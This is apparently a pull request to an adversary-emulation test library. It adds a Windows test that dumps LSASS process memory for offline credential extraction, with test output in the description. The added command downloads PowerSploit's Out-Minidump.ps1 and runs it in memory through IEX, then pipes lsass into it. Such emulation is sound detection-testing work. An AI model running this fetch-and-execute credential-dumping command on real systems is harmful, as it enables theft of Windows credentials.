### PR TITLE
Out minidump

### DIFF
--- a/atomics/T1003.001/T1003.001.yaml
+++ b/atomics/T1003.001/T1003.001.yaml
@@ -233,3 +233,17 @@ atomic_tests:
       pypykatz live lsa
     name: command_prompt
     elevation_required: true
+- name: Dump LSASS.exe Memory using Out-Minidump.ps1
+  description: |
+    The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure
+    powershell implementation that leverages the MiniDumpWriteDump Win32 API call.
+    Upon successful execution, you should see the following file created $env:SYSTEMROOT\System32\lsass_*.dmp.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+       IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump
+    cleanup_command: |
+      Remove-Item $env:SYSTEMROOT\System32\lsass_*.dmp -ErrorAction Ignore
+    name: powershell
+    elevation_required: true

--- a/atomics/T1003.001/T1003.001.yaml
+++ b/atomics/T1003.001/T1003.001.yaml
@@ -244,6 +244,6 @@ atomic_tests:
     command: |
        IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump
     cleanup_command: |
-      Remove-Item $env:SYSTEMROOT\System32\lsass_*.dmp -ErrorAction Ignore
+      Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
     name: powershell
     elevation_required: true


### PR DESCRIPTION
Adding in a credential dumping test that leverages Out-Minidump.ps1 to dump the contents of lsass to disk for offline extraction

**Details:**
Adversaries can leverage Out-Minidump.ps1 to dump the contents of any processes memory to disk. In this test we are specifically targeting lsass to demonstrate how an attacker could use this script.

**Testing:**
```
PS C:\AtomicRedTeam> Invoke-AtomicTest T1003.001 -TestNumbers 8                                                         PathToAtomicsFolder = C:\AtomicRedTeam\atomic-red-team\atomics

Executing test: T1003.001-8 Dump LSASS.exe Memory using Out-Minidump.ps1
Done executing test: T1003.001-8 Dump LSASS.exe Memory using Out-Minidump.ps1


    Directory: C:\Users\Tom Brady\AppData\Local\Temp


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         1/13/2021   1:51 PM       58739073 lsass_700.dmp
```

```
PS C:\AtomicRedTeam> Invoke-AtomicTest T1003.001 -TestNumbers 8 -Cleanup
PathToAtomicsFolder = C:\AtomicRedTeam\atomic-red-team\atomics

Executing cleanup for test: T1003.001-8 Dump LSASS.exe Memory using Out-Minidump.ps1
Done executing cleanup for test: T1003.001-8 Dump LSASS.exe Memory using Out-Minidump.ps1
```

**Associated Issues:**
None